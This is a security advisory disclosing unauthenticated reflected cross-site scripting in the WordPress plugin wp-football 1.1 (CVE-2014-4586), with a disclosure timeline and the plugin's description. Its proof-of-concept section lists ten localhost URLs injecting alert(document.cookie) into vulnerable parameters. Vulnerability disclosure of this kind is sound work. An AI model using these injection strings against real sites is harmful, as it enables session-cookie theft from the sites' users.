wp-plugin : wp-football – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : wp-football

 

Effected Version : 1.1 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 
http://localhost/wp-content/plugins/wp-football/football_classification.php?league=league">alert(document.cookie)&group=group

http://localhost/wp-content/plugins/wp-football/football_criteria.php?league=league'>alert(document.cookie)&

http://localhost/wp-content/plugins/wp-football/football-functions.php?ajax=1&id_group=id_group&id_league=id_league&f=f'>alert(document.cookie)&id_phase=id_phase

http://localhost/wp-content/plugins/wp-football/football_groups_list.php?action=action&paged=paged&id=id">alert(document.cookie)&byajax=byajax

http://localhost/wp-content/plugins/wp-football/football_matches_list.php?action=action&paged=paged&id=id">alert(document.cookie)&

http://localhost/wp-content/plugins/wp-football/football_matches_load.php?action=delete&paged=paged&id_group=id_group&id_league=id_league">alert(document.cookie)&id_phase=id

http://localhost/wp-content/plugins/wp-football/football_matches_phase.php?action=action&paged=paged&id=id">alert(document.cookie)&id_phase=id_phase

http://localhost/wp-content/plugins/wp-football/football_phases_list.php?action=action&paged=paged&id=id">alert(document.cookie)&

http://localhost/wp-content/plugins/wp-football/templates/template_default_preview.php?league=league">alert(document.cookie)&

http://localhost/wp-content/plugins/wp-football/templates/template_worldCup_preview.php?league=league">alert(document.cookie)&

 

Vulnerable Parameters : league, id, f

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-17

 
Plugin Status : Closed
 
Public Disclosure : June 12, 2014
 
CVE Number : CVE-2014-4586

 
Plugin Description :
 
Administer football (soccer) championships.

= Features =

* Complete table of the World Cup 2010. Built to activate the plugin - in Portuguese or English according to the language defined in WP;
* The League table or part may be published through widgets or posts / pages. See how in the item "Frequently Asked Questions";
* In the Templates submenu you can configure the fields to be displayed so you can fit the layout of your theme. Currently are available the templates of the Cup and of two widgets - compact and extended versions. The templates are created in the activation of the plugin;
* Has uninstaller, developed based on WP-Email plugin of [Lester 'GaMerZ' Chan](http://lesterchan.net/);
* Automatically calculates, from the classification criteria, classification of teams per group when is informed the result of a match.

All the information you need about this plugin can be found in Plugin Homepage.

Leave a Reply

Your email address will not be published. Required fields are marked *